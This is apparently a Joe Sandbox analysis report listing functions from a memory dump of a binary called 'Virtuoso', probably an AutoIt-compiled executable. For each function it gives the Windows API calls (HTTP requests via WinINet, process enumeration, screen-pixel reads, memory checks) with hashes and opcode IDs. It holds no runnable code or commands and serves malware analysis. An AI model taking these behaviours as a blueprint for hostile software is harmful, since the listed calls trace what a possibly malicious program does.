                                                                            • Instruction Fuzzy Hash: FD112E31500245FFDB616F64EC4CBE97BA6EB18321F508265FA69950E1CF710991EF50
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 001F211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 001F2148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001F218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 001F219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 001F21AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 001F21DC
                                                                            • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 001F2223
                                                                              • Part of subcall function 001F2B4F: GetLastError.KERNEL32(?,?,001F1EE3,00000000,00000000,00000001), ref: 001F2B64
                                                                              • Part of subcall function 001F2B4F: SetEvent.KERNEL32(?,?,001F1EE3,00000000,00000000,00000001), ref: 001F2B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: d691c8af1dffbecae46f4d4dd341c410d4bb4c105d1b5dba00cd0f156f1fe646
                                                                            • Instruction ID: ca80bb9a12a29cab060ba09a2b2af2f1accf545f8a35a844c3ebbbee7ab6282b
                                                                            • Opcode Fuzzy Hash: d691c8af1dffbecae46f4d4dd341c410d4bb4c105d1b5dba00cd0f156f1fe646
                                                                            • Instruction Fuzzy Hash: D6418DB190120CBFEB129F50DC89FFB7BACEF18354F108116FA059A191DBB49E458BA5
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 001821B8
                                                                            • GetWindowRect.USER32(?,?), ref: 001821F9
                                                                            • ScreenToClient.USER32(?,?), ref: 00182221
                                                                            • GetClientRect.USER32(?,?), ref: 00182350
                                                                            • GetWindowRect.USER32(?,?), ref: 00182369
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: c9f116efbd71734d28bd9d407f35702e40a76f874dcb4f9aafdfc5cffa893216
                                                                            • Instruction ID: b7c4795862bd60af28d3c2bf46d4fbe7cb0e30b78fef58e2527b3ccaf238f20b
                                                                            • Opcode Fuzzy Hash: c9f116efbd71734d28bd9d407f35702e40a76f874dcb4f9aafdfc5cffa893216
                                                                            • Instruction Fuzzy Hash: 02B16A39A00249DBDF14DFA8C9847EEB7B1FF08310F148129ED59AB654EB74AA50CF64
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 001F6159
                                                                            • GetForegroundWindow.USER32 ref: 001F6170
                                                                            • GetDC.USER32(00000000), ref: 001F61AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 001F61B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 001F61F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 7c1c54c7b87022efa9614d9f94c9c283fe954a8f43fe351b2108a7a1bcc536b8
                                                                            • Instruction ID: 4788a9d179756a425484d26de0aab4c4da72f1ff1aa59df0d0e162c067f1ce4f
                                                                            • Opcode Fuzzy Hash: 7c1c54c7b87022efa9614d9f94c9c283fe954a8f43fe351b2108a7a1bcc536b8
                                                                            • Instruction Fuzzy Hash: 49219F75A00604AFD704EF65DC88AAABBF9EF98310F04C469F94AD7252CF70AD40CB90
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0020826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0020827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00208284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 43400e7518117f2f1e70f84aa66ecd833989d764f84787dd481fca32e70c967a
                                                                            • Instruction ID: 333c9c036c2827ae2633955ec1c12d17ae876b5a02ac4af72f48261340df9d6f
                                                                            • Opcode Fuzzy Hash: 43400e7518117f2f1e70f84aa66ecd833989d764f84787dd481fca32e70c967a
                                                                            • Instruction Fuzzy Hash: 0021BCB5610209AFDB10DF24DCC5DA737ACEB6A354B040059FA109B392CB70EC21DBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 874894caaa7a9c756a0a79910272ca8f2f7156ed3baba9b668a288f50ff1fcc1
                                                                            • Instruction ID: 9ed4ad28c084bc496565d153c96232c1fcd90c7eaf1695c1dfe3c05a7d691d4f
                                                                            • Opcode Fuzzy Hash: 874894caaa7a9c756a0a79910272ca8f2f7156ed3baba9b668a288f50ff1fcc1
                                                                            • Instruction Fuzzy Hash: A3D01271818108EAC70E9A90D845FF9737CAB6C340F224156F506A2040D735C7A89B26
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8308
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8320
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00210988,000000FF,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8345
                                                                            • _memcmp.LIBCMT ref: 001D8366
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: fa21da6565f0fc69e1e481c2b0fa6ad3c229a13c450046fe378bc25e71ac4a09
                                                                            • Instruction ID: 78dd4aaa251c9192bd9e72d3f05c7bc9c1f3d5100c94a829af8d9eed9cd3a1ec
                                                                            • Opcode Fuzzy Hash: fa21da6565f0fc69e1e481c2b0fa6ad3c229a13c450046fe378bc25e71ac4a09
                                                                            • Instruction Fuzzy Hash: 6C812A71A00109EFCB04DFD4C988EEEB7B9FF89715F204599E506AB250DB71AE46CB60
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 001E416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 001E417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 001E419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 001E4245
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 92c097a5d4cc2354cc04773d1da9791079f26420d685a9ac218df7d9dce936e0
                                                                            • Instruction ID: 69683bbcecb6adc8e44b3a13a1f60f5836ffe3794a726de10d83dff89ecb2164
                                                                            • Opcode Fuzzy Hash: 92c097a5d4cc2354cc04773d1da9791079f26420d685a9ac218df7d9dce936e0
                                                                            • Instruction Fuzzy Hash: 6D31B671108342AFD704EF51E885AAFBBE8BFA5350F50052DF585C31A1EBB19989CB52
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00182004), ref: 0018214F
                                                                            • GetStockObject.GDI32(00000011,00000000,?,00000096,?,00182004,?,?,static,00210980,?,?,?,00000096,00000096,?), ref: 00182163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00182004,?,?,static,00210980,?,?,?,00000096,00000096), ref: 0018216D
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: cd101dad35a6d4c0b7060e56b9d10b06416aed24effd6e1c118e292b276ee40f
                                                                            • Instruction ID: c3183f56cf079da4aac2071bcdec60523882fe091f23f5712fcfeac900a85428
                                                                            • Opcode Fuzzy Hash: cd101dad35a6d4c0b7060e56b9d10b06416aed24effd6e1c118e292b276ee40f
                                                                            • Instruction Fuzzy Hash: DE118B7210124DBFDB039FA0AC88EEABB69EF69354F154112FA0452064CB71DDA1AFA0
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0018E01E
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0018E037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 87686bd77bb7f5b750879b25fb134be131996b3253b51af847915178d5b05eeb
                                                                            • Instruction ID: 0a4a5e6352c9a7286077a0eb45b2f4b4850021f28388ca94207aea22a768140b
                                                                            • Opcode Fuzzy Hash: 87686bd77bb7f5b750879b25fb134be131996b3253b51af847915178d5b05eeb
                                                                            • Instruction Fuzzy Hash: 57514A714087459BE320AF50E885BAFB7F8FF94714F51894DF1D8411A1EF709529CB16
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00208186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0020819B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 066d61fd337cb1bff8940b09a483fff51df064ab3b80718073c4d2c6314486bd
                                                                            • Instruction ID: ab6dc6563d12705421c4d9e1eae33d6d23c0bed5d41638295086b200ccb0966b
                                                                            • Opcode Fuzzy Hash: 066d61fd337cb1bff8940b09a483fff51df064ab3b80718073c4d2c6314486bd
                                                                            • Instruction Fuzzy Hash: 69412A74A1030A9FDB14CF64D881BDABBB5FF09300F10056AE958EB392DB70A956CF90
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 001F4132
                                                                              • Part of subcall function 00191A36: _memmove.LIBCMT ref: 00191A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: e6c0d87f52dc043e2c3d9a3bf4c5b7a68eacaeef79badb56d3f3e337798a7db7
                                                                            • Instruction ID: 018f67e257ce0e7060c8e486f84e492a5ebcf3a2ba00bfedf81bbe46ba08852f
                                                                            • Opcode Fuzzy Hash: e6c0d87f52dc043e2c3d9a3bf4c5b7a68eacaeef79badb56d3f3e337798a7db7
                                                                            • Instruction Fuzzy Hash: 8E21D070A0021DAFCF04EFA4C892EBE77B5EF65740F440065FA05A7281DB30EA85CBA1